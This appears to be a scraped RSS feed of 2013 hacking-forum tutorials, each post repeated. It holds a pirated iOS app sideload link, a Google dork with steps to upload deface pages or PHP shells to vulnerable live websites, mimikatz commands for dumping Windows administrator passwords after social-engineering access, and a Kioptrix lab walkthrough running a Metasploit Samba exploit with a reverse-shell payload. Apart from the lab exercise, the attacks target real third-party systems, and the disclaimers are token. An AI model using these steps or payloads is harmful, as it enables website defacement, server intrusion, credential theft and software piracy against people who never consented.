In this tutorial, I'll be teaching you how to get Display Recorder (The App Store Version) for FREE! I know what you're thinking. Can't I just get that off of the 3rd party app stores. No, you cant. None of the IPA's work. You will be using AppCake, but you won't be using any AppCake IPA's. You'll need a few things before you start.<br />
<ol type="1">
<li>A Jailbroken iPhone</li>
<li>AppCake</li>
<li>iFile<br />
</li></ol>
<br />
<span style="color: #FF0000;"><span style="font-size: xx-large;">How To Do It</span></span><br />
Once you have all 3 of the things listed above, go on to safari, and go to the following link.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>https://dl.dropboxusercontent.com/s/6f1sdsxyy7pbdva/display_recorder_v1.0.ipa?dl=1</code></div></div>
Once there, on the top-left of your screen, it should say "Open in...", click that. Then click iFile. When you click that, it will redirect you to AppCake, but relax! That's what it's supposed to do. Now that you're in Appcake, go to your downloads, and choose downloaded. One of your downloaded apps should be the display recorder. Click it, and install it. It should only take a minute or two, and then you have it!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[IMCE Remote File Upload Vulnerability]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-IMCE-Remote-File-Upload-Vulnerability</link>
			<pubDate>Fri, 14 Jun 2013 05:54:10 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-IMCE-Remote-File-Upload-Vulnerability</guid>
			<description><![CDATA[Hello Hack Community.<br />
<br />
Through this tutorial, I'm going to teach you how to upload your deface page or maybe even shells on remote servers of websites.<br />
<br />
The dork for finding vulnerable websites is : <span style="font-weight: bold;"><span style="color: #FF0000;">inurl:"/imce?dir=" intitle:"File Browser"</span></span><br />
<br />
The vulnerable url will be something like this : <a href="http://site.com/imce?dir=" target="_blank">http://site.com/imce?dir=</a><br />
<br />
Once you open up the URL, it should look like this :<br />
<img src="http://i1.minus.com/iberp17dDCHp7w.png" border="0" alt="[Image: iberp17dDCHp7w.png]" /><br />
<br />
Now, on the left panel, click on the blue folder.<br />
The blue folder is the root and clicking on it, takes you to the root directory. If it says <span style="color: #FF0000;">Access Denied</span>, go to another site.<br />
<br />
Now, click on the upload button as shown in the screenshot.<br />
Select your deface page in HTML format or shell in PHP format and click on Upload.<br />
<br />
After your file is uploaded, it should look like this :<br />
<img src="http://i1.minus.com/ibbPaPmM0QT0lY.png" border="0" alt="[Image: ibbPaPmM0QT0lY.png]" /><br />
<br />
The file you've uploaded will be selected automatically.<br />
To view your deface page, double click on the selected file.<br />
Here's mine :<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i7.minus.com/ivicu8rLfGTG3.png" border="0" alt="[Image: ivicu8rLfGTG3.png]" /></div></div>
And you're done!!! Your deface page or shell got uploaded and executed.<img src="images/twist-sd/smiley/cool.png" style="vertical-align: middle;" border="0" alt="Cool" title="Cool" /><img src="images/smilies/whistle3.gif" style="vertical-align: middle;" border="0" alt="Whistle" title="Whistle" /><br />
<span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #00BFFF;"><br />
Remember, our forum is an ethical hacking forum. Do not abuse, threaten or blackmail the owner of the website through your deface page or shell.<br />
Try as far as possible to keep it ethical.<br />
This tutorial is for educational purposes only. Please do not harm anybody and avoid getting into trouble.</span></span></span><br />
<br />
Please do not forget to give feedback.]]></description>
			<content:encoded><![CDATA[Hello Hack Community.<br />
<br />
Through this tutorial, I'm going to teach you how to upload your deface page or maybe even shells on remote servers of websites.<br />
<br />
The dork for finding vulnerable websites is : <span style="font-weight: bold;"><span style="color: #FF0000;">inurl:"/imce?dir=" intitle:"File Browser"</span></span><br />
<br />
The vulnerable url will be something like this : <a href="http://site.com/imce?dir=" target="_blank">http://site.com/imce?dir=</a><br />
<br />
Once you open up the URL, it should look like this :<br />
<img src="http://i1.minus.com/iberp17dDCHp7w.png" border="0" alt="[Image: iberp17dDCHp7w.png]" /><br />
<br />
Now, on the left panel, click on the blue folder.<br />
The blue folder is the root and clicking on it, takes you to the root directory. If it says <span style="color: #FF0000;">Access Denied</span>, go to another site.<br />
<br />
Now, click on the upload button as shown in the screenshot.<br />
Select your deface page in HTML format or shell in PHP format and click on Upload.<br />
<br />
After your file is uploaded, it should look like this :<br />
<img src="http://i1.minus.com/ibbPaPmM0QT0lY.png" border="0" alt="[Image: ibbPaPmM0QT0lY.png]" /><br />
<br />
The file you've uploaded will be selected automatically.<br />
To view your deface page, double click on the selected file.<br />
Here's mine :<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i7.minus.com/ivicu8rLfGTG3.png" border="0" alt="[Image: ivicu8rLfGTG3.png]" /></div></div>
And you're done!!! Your deface page or shell got uploaded and executed.<img src="images/twist-sd/smiley/cool.png" style="vertical-align: middle;" border="0" alt="Cool" title="Cool" /><img src="images/smilies/whistle3.gif" style="vertical-align: middle;" border="0" alt="Whistle" title="Whistle" /><br />
<span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #00BFFF;"><br />
Remember, our forum is an ethical hacking forum. Do not abuse, threaten or blackmail the owner of the website through your deface page or shell.<br />
Try as far as possible to keep it ethical.<br />
This tutorial is for educational purposes only. Please do not harm anybody and avoid getting into trouble.</span></span></span><br />
<br />
Please do not forget to give feedback.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hack Windows XP, 7, 8 Passwords]]></title>
			<link>http://www.hackcommunity.com/Thread-Tutorial-Hack-Windows-XP-7-8-Passwords</link>
			<pubDate>Fri, 14 Jun 2013 04:46:22 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-Tutorial-Hack-Windows-XP-7-8-Passwords</guid>
			<description><![CDATA[Hello Hack Community,<br />
In this tutorial, I'll be teaching you how to obtain Windows XP, 7 and 8 administrator passwords in plain text.<br />
The only criterion for this to work is, you need to be logged in as the computer administrator.<br />
This is where you need to use your social engineering skills to convince the computer administrator to let you use the administrator account.<br />
First of all, download this :<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip</code></div></div>
This is the tool we'll be using to obtain the password.<br />
<span style="font-weight: bold;">I'm not posting a virus scan for this as every tool of this category is detected as a malicious tool which is actually false.</span><br />
But, I assure you, this tool is not harmful for your system because I've used it and no harmful effects was observed in my computer.<br />
Here is the official blog of the coder of this tool : <a href="http://blog.gentilkiwi.com" target="_blank">http://blog.gentilkiwi.com</a><br />
<br />
So, lets begin.<br />
1. Get access to the administrator account(mentioned before).<br />
<br />
2. After you download <span style="color: #FF0000;">mimikatz_trunk.zip</span>, extract it.<br />
<br />
3. Now navigate it to this folder "<span style="color: #FF0000;">mimikatz_trunk--&gt;alpha--&gt;win32</span>" if your OS is 32 bit or "<span style="color: #FF0000;">mimikatz_trunk--&gt;alpha--&gt;x64</span>" if your system is 64 bit.<br />
<br />
4. Right click on <span style="color: #FF0000;">mimikatz.exe</span> and click on <span style="color: #FF0000;">Run as Administrator</span> (this is mandatory).<br />
<br />
5. Now, on the command line, type "<span style="color: #FF0000;">privilege::debug</span>" without quotes and press enter. You'll get a message saying "Privilege '20' OK".<br />
<br />
6. Now, type "<span style="color: #FF0000;">sekurlsa::logonpasswords</span>" without quotes.<br />
<br />
You'll get something like this :<br />
<br />
<img src="http://i6.minus.com/iAAxSP0ava4hA.png" border="0" alt="[Image: iAAxSP0ava4hA.png]" /><br />
I've whitened my username and password for privacy reasons.<br />
<br />
This screenshot is a proof of this method working.<br />
<br />
<span style="color: #00BFFF;">And done!!!<br />
You now have the administrator password!!!<br />
</span><br />
<br />
<span style="font-weight: bold;"><span style="color: #00BFFF;">Enjoy hacking!!!!</span></span><img src="images/twist-sd/smiley/cool.png" style="vertical-align: middle;" border="0" alt="Cool" title="Cool" /><br />
<br />
Please do not forget to give feedback!!]]></description>
			<content:encoded><![CDATA[Hello Hack Community,<br />
In this tutorial, I'll be teaching you how to obtain Windows XP, 7 and 8 administrator passwords in plain text.<br />
The only criterion for this to work is, you need to be logged in as the computer administrator.<br />
This is where you need to use your social engineering skills to convince the computer administrator to let you use the administrator account.<br />
First of all, download this :<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip</code></div></div>
This is the tool we'll be using to obtain the password.<br />
<span style="font-weight: bold;">I'm not posting a virus scan for this as every tool of this category is detected as a malicious tool which is actually false.</span><br />
But, I assure you, this tool is not harmful for your system because I've used it and no harmful effects was observed in my computer.<br />
Here is the official blog of the coder of this tool : <a href="http://blog.gentilkiwi.com" target="_blank">http://blog.gentilkiwi.com</a><br />
<br />
So, lets begin.<br />
1. Get access to the administrator account(mentioned before).<br />
<br />
2. After you download <span style="color: #FF0000;">mimikatz_trunk.zip</span>, extract it.<br />
<br />
3. Now navigate it to this folder "<span style="color: #FF0000;">mimikatz_trunk--&gt;alpha--&gt;win32</span>" if your OS is 32 bit or "<span style="color: #FF0000;">mimikatz_trunk--&gt;alpha--&gt;x64</span>" if your system is 64 bit.<br />
<br />
4. Right click on <span style="color: #FF0000;">mimikatz.exe</span> and click on <span style="color: #FF0000;">Run as Administrator</span> (this is mandatory).<br />
<br />
5. Now, on the command line, type "<span style="color: #FF0000;">privilege::debug</span>" without quotes and press enter. You'll get a message saying "Privilege '20' OK".<br />
<br />
6. Now, type "<span style="color: #FF0000;">sekurlsa::logonpasswords</span>" without quotes.<br />
<br />
You'll get something like this :<br />
<br />
<img src="http://i6.minus.com/iAAxSP0ava4hA.png" border="0" alt="[Image: iAAxSP0ava4hA.png]" /><br />
I've whitened my username and password for privacy reasons.<br />
<br />
This screenshot is a proof of this method working.<br />
<br />
<span style="color: #00BFFF;">And done!!!<br />
You now have the administrator password!!!<br />
</span><br />
<br />
<span style="font-weight: bold;"><span style="color: #00BFFF;">Enjoy hacking!!!!</span></span><img src="images/twist-sd/smiley/cool.png" style="vertical-align: middle;" border="0" alt="Cool" title="Cool" /><br />
<br />
Please do not forget to give feedback!!]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[walkthrough] Kioptix Level 1]]></title>
			<link>http://www.hackcommunity.com/Thread-walkthrough-Kioptix-Level-1</link>
			<pubDate>Tue, 11 Jun 2013 18:06:09 +0000</pubDate>
			<guid isPermaLink="false">http://www.hackcommunity.com/Thread-walkthrough-Kioptix-Level-1</guid>
			<description><![CDATA[<span style="color: #98FB98;"><span style="font-size: x-large;"><span style="font-family: Tahoma;">[Walkthrough]</span></span></span> <span style="color: #FF6347;"><span style="font-size: x-large;"><span style="font-family: Tahoma;">Kioptix</span></span></span> <span style="color: #00BFFF;"><span style="font-size: x-large;"><span style="font-family: Tahoma;">Level 1<br />
</span></span></span><br />
I am going to demonstrate how we can pawn Kioptix Level 1 Challenging server.<br />
Kioptix series are well known , made by hackers for hackers.<br />
You can download them at &gt;&gt;<br />
<blockquote><cite>Quote:</cite><a href="http://www.kioptix.com" target="_blank">http://www.kioptix.com</a></blockquote>
Challenging servers are also called <span style="font-weight: bold;"><span style="color: #FF69B4;">"boot-to-root"</span></span><br />
It is safe to test on your own local machine.<br />
Here we go <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<br />
(<span style="color: #FFD700;">0x0</span><span style="color: #FF6347;">1</span>) <span style="color: #98FB98;"><span style="font-weight: bold;">Prepare for battle</span></span><br />
We open the <span style="color: #FFFFE0;">vmdk</span> (vm disk) to <span style="color: #FF1493;">boot</span> the <span style="color: #E0FFFF;">kioptix.</span><br />
If everythings fine, you will see the welcome screen of <span style="color: #1E90FF;">Red hat linux logon</span>.<br />
<br />
There may be <span style="color: #DAA520;"><span style="font-weight: bold;">various way</span></span> which we can take privilege.<br />
But now I will demonstrate with <span style="font-style: italic;"><span style="color: #1E90FF;">MSF</span></span>.<br />
<br />
(<span style="color: #FFD700;">0x0</span><span style="color: #FF6347;">2</span>) <span style="color: #98FB98;"><span style="font-weight: bold;">Reconnaissance</span></span><br />
We must first reconnaissance to our enemy <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /><br />
So I perform a basic <span style="color: #FF6347;">nmap</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/x9wU06e.png" border="0" alt="[Image: x9wU06e.png]" /></div></div><div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&#36;. nmap 192.168.37.1/24</code></div></div>
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/RMS7Ti9.png" border="0" alt="[Image: RMS7Ti9.png]" /></div></div>Now we could see the general results showing services running along the server.<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/D74UIAI.png" border="0" alt="[Image: D74UIAI.png]" /></div></div>I marked down the <span style="color: #87CEEB;">IP</span> and load in the browser to see what we can take advantage.<br />
The front page is merely a <span style="color: #E0FFFF;">test page</span> but wait there are some Links.<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/UGn6KrD.png" border="0" alt="[Image: UGn6KrD.png]" /></div></div>Let's follow the links and you will see some mods.<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/YYq0naE.png" border="0" alt="[Image: YYq0naE.png]" /></div></div>You can see ,they use <span style="color: #FF6347;"><span style="font-weight: bold;">mod_ssl</span></span> which we can pawn with <span style="color: #FFFFE0;">Openfuck.c</span>. But right now,<br />
I would take advantage of "<span style="color: #FFA500;">netbios-ssn</span>" service along with msf.<br />
So I deep scan again using this cmd<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&#36;. nmap 192.168.37.128 -sV -PN -A</code></div></div>
<br />
You could see a bunch of ports with services are open.<br />
Take a look at <span style="color: #FF4500;">139 </span>port number.<br />
It's sevice is "s<span style="color: #FFA500;">amba</span>"!.<br />
So, next....<br />
<br />
(<span style="color: #FFD700;">0x0</span><span style="color: #FF6347;">3</span>) <span style="font-weight: bold;"><span style="color: #98FB98;">Launch primary weapon</span></span><br />
So , I use my nuclear <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /> ~ <span style="color: #98FB98;"><span style="font-weight: bold;">Metasploit</span></span>.<br />
When I got to msf_console.<br />
I <span style="color: #FF1493;">search</span> for exploits naming "<span style="color: #FF69B4;">samba</span>"<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; search "linux samba"</code></div></div>
<br />
As you can see , a ton of exploits and payloads are shown up.<br />
I looked for linux samba and the exploit name <span style="color: #E0FFFF;">exploit/linux/samba/trans2open</span>.<br />
For now we will use that one.<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/pv969Cp.png" border="0" alt="[Image: pv969Cp.png]" /></div></div><div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; use exploit/linux/samba/trans2open</code></div></div>
<br />
Now, we have to configure the weapon to be maximum level <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /><br />
I started with general options<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; show options</code></div></div>
<br />
As you can see, we have to adjust current settings ...so<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; set rhost 192.168.37.128</code></div></div>
<br />
now , we have to choose which <span style="color: #FFD700;">payload</span> we should use.<br />
So..<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; show payloads</code></div></div>
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/WQnlDJr.png" border="0" alt="[Image: WQnlDJr.png]" /></div></div>A ton of payloads are shown up.<br />
I choose<span style="color: #FF6347;"> linux/x86/shell_reverse_tcp</span><br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; set payload linux/x86/shell_reverse_tcp</code></div></div>
<br />
See options again.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; show options</code></div></div>
<br />
we have to the local host with our <span style="color: #FFD700;">IP</span>.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; set lhost 192.168.37.1</code></div></div>
<br />
So everything is configured and now we can start our attack.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; exploit</code></div></div>
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/Jr2brcM.png" border="0" alt="[Image: Jr2brcM.png]" /></div></div><span style="font-weight: bold;"><span style="color: #FF6347;">Boom</span></span>~!!!<br />
We can see shell sessions <img src="images/smilies/dance3.gif" style="vertical-align: middle;" border="0" alt="Dance" title="Dance" /><br />
type around and play with root <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /><br />
<br />
Regards<br />
<span style="color: #98FB98;">Mr.Geek</span>@<span style="color: #FF6347;">HC</span><span style="color: #32CD32;">:~#</span> <span style="color: #00BFFF;">logout</span>]]></description>
			<content:encoded><![CDATA[<span style="color: #98FB98;"><span style="font-size: x-large;"><span style="font-family: Tahoma;">[Walkthrough]</span></span></span> <span style="color: #FF6347;"><span style="font-size: x-large;"><span style="font-family: Tahoma;">Kioptix</span></span></span> <span style="color: #00BFFF;"><span style="font-size: x-large;"><span style="font-family: Tahoma;">Level 1<br />
</span></span></span><br />
I am going to demonstrate how we can pawn Kioptix Level 1 Challenging server.<br />
Kioptix series are well known , made by hackers for hackers.<br />
You can download them at &gt;&gt;<br />
<blockquote><cite>Quote:</cite><a href="http://www.kioptix.com" target="_blank">http://www.kioptix.com</a></blockquote>
Challenging servers are also called <span style="font-weight: bold;"><span style="color: #FF69B4;">"boot-to-root"</span></span><br />
It is safe to test on your own local machine.<br />
Here we go <img src="images/smilies/smile.gif" style="vertical-align: middle;" border="0" alt="Smile" title="Smile" /><br />
<br />
(<span style="color: #FFD700;">0x0</span><span style="color: #FF6347;">1</span>) <span style="color: #98FB98;"><span style="font-weight: bold;">Prepare for battle</span></span><br />
We open the <span style="color: #FFFFE0;">vmdk</span> (vm disk) to <span style="color: #FF1493;">boot</span> the <span style="color: #E0FFFF;">kioptix.</span><br />
If everythings fine, you will see the welcome screen of <span style="color: #1E90FF;">Red hat linux logon</span>.<br />
<br />
There may be <span style="color: #DAA520;"><span style="font-weight: bold;">various way</span></span> which we can take privilege.<br />
But now I will demonstrate with <span style="font-style: italic;"><span style="color: #1E90FF;">MSF</span></span>.<br />
<br />
(<span style="color: #FFD700;">0x0</span><span style="color: #FF6347;">2</span>) <span style="color: #98FB98;"><span style="font-weight: bold;">Reconnaissance</span></span><br />
We must first reconnaissance to our enemy <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /><br />
So I perform a basic <span style="color: #FF6347;">nmap</span><br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/x9wU06e.png" border="0" alt="[Image: x9wU06e.png]" /></div></div><div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&#36;. nmap 192.168.37.1/24</code></div></div>
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/RMS7Ti9.png" border="0" alt="[Image: RMS7Ti9.png]" /></div></div>Now we could see the general results showing services running along the server.<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/D74UIAI.png" border="0" alt="[Image: D74UIAI.png]" /></div></div>I marked down the <span style="color: #87CEEB;">IP</span> and load in the browser to see what we can take advantage.<br />
The front page is merely a <span style="color: #E0FFFF;">test page</span> but wait there are some Links.<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/UGn6KrD.png" border="0" alt="[Image: UGn6KrD.png]" /></div></div>Let's follow the links and you will see some mods.<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/YYq0naE.png" border="0" alt="[Image: YYq0naE.png]" /></div></div>You can see ,they use <span style="color: #FF6347;"><span style="font-weight: bold;">mod_ssl</span></span> which we can pawn with <span style="color: #FFFFE0;">Openfuck.c</span>. But right now,<br />
I would take advantage of "<span style="color: #FFA500;">netbios-ssn</span>" service along with msf.<br />
So I deep scan again using this cmd<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&#36;. nmap 192.168.37.128 -sV -PN -A</code></div></div>
<br />
You could see a bunch of ports with services are open.<br />
Take a look at <span style="color: #FF4500;">139 </span>port number.<br />
It's sevice is "s<span style="color: #FFA500;">amba</span>"!.<br />
So, next....<br />
<br />
(<span style="color: #FFD700;">0x0</span><span style="color: #FF6347;">3</span>) <span style="font-weight: bold;"><span style="color: #98FB98;">Launch primary weapon</span></span><br />
So , I use my nuclear <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /> ~ <span style="color: #98FB98;"><span style="font-weight: bold;">Metasploit</span></span>.<br />
When I got to msf_console.<br />
I <span style="color: #FF1493;">search</span> for exploits naming "<span style="color: #FF69B4;">samba</span>"<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; search "linux samba"</code></div></div>
<br />
As you can see , a ton of exploits and payloads are shown up.<br />
I looked for linux samba and the exploit name <span style="color: #E0FFFF;">exploit/linux/samba/trans2open</span>.<br />
For now we will use that one.<br />
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/pv969Cp.png" border="0" alt="[Image: pv969Cp.png]" /></div></div><div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; use exploit/linux/samba/trans2open</code></div></div>
<br />
Now, we have to configure the weapon to be maximum level <img src="images/smilies/biggrin.gif" style="vertical-align: middle;" border="0" alt="Biggrin" title="Biggrin" /><br />
I started with general options<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; show options</code></div></div>
<br />
As you can see, we have to adjust current settings ...so<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; set rhost 192.168.37.128</code></div></div>
<br />
now , we have to choose which <span style="color: #FFD700;">payload</span> we should use.<br />
So..<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; show payloads</code></div></div>
<div><div class="quote_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='<button>Click to View</button>';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='<button>Click to Hide</button>';}"><button>Click to View</button></a></div><div class="quote_body" style="display: none;"><img src="http://i.imgur.com/WQnlDJr.png" border="0" alt="[Image: WQnlDJr.png]" /></div></div>A ton of payloads are shown up.<br />
I choose<span style="color: #FF6347;"> linux/x86/shell_reverse_tcp</span><br />
<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; set payload linux/x86/shell_reverse_tcp</code></div></div>
<br />
See options again.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; show options</code></div></div>
<br />
we have to the local host with our <span style="color: #FFD700;">IP</span>.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; set lhost 192.168.37.1</code></div></div>
<br />
So everything is configured and now we can start our attack.<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>msf &gt; exploit</code></div></div>
